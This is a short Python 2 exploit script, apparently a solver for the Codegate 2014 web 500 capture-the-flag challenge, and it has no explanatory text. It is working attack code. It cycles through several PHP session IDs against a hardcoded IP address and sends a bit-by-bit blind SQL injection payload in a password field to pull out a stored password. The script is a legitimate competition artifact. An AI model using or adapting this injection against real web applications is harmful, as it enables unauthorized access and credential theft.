codegate 2014 web 500

1. import httplib
2. import urllib
3. import sys
4. import time
5.  
6. # code by tunz
7.  
8. conn = httplib.HTTPConnection('58.229.183.24',80)
9. conn.connect()
10.  
11. session_header = '95hem28h053quulk22r5696me'
12.  
13. answer = ""
14.  
15. # create sessions
16. for i in range(0, 10):
17.     ch = chr(ord('0') + i)
18.     print "Session make: "+ch
19.     conn.putrequest('GET', '/5a520b6b783866fd93f9dcdaf753af08/index.php')
20.     conn.putheader('Cookie', 'PHPSESSID='+session_header+ch+';')
21.     conn.endheaders()
22.     resp = conn.getresponse()
23.     data = resp.read()
24.  
25. # injection
26. for aa in range(0, 10):
27.  ch = chr(ord('0') + aa)
28.  for k in range(1 + aa*5, 6 + aa*5):
29.    i=0
30.    for m in range(1, 9):
31.         query = "' or substr(LPAD(bin(ascii(substr(password,"+str(k)+",1))),8,0),"+str(m)+",1)=0x31 and 'a' = 'a"
32.         params = 'password='+urllib.quote(query)
33.         conn.putrequest('POST', '/5a520b6b783866fd93f9dcdaf753af08/index.php')
34.         conn.putheader('Content-length', str(len(params)))
35.         conn.putheader('Content-Type', 'application/x-www-form-urlencoded')
36.         conn.putheader('Cookie', 'PHPSESSID='+session_header + ch +';')
37.         conn.endheaders()
38.         conn.send(params)
39.  
40.         resp = conn.getresponse()
41.         data = resp.read()
42.  
43.         if "True" in data:
44.             i += pow(2,8-m)
45.             print str(m)+" "+str(i)
46.    answer = answer + chr(i)
47.    print "Find: "+answer
48.  if len(answer) == 30:
49.     break
50.  
51. print "Answer: "+answer
52. print "Session: "+session_header+'9'
53.  
54. conn.close()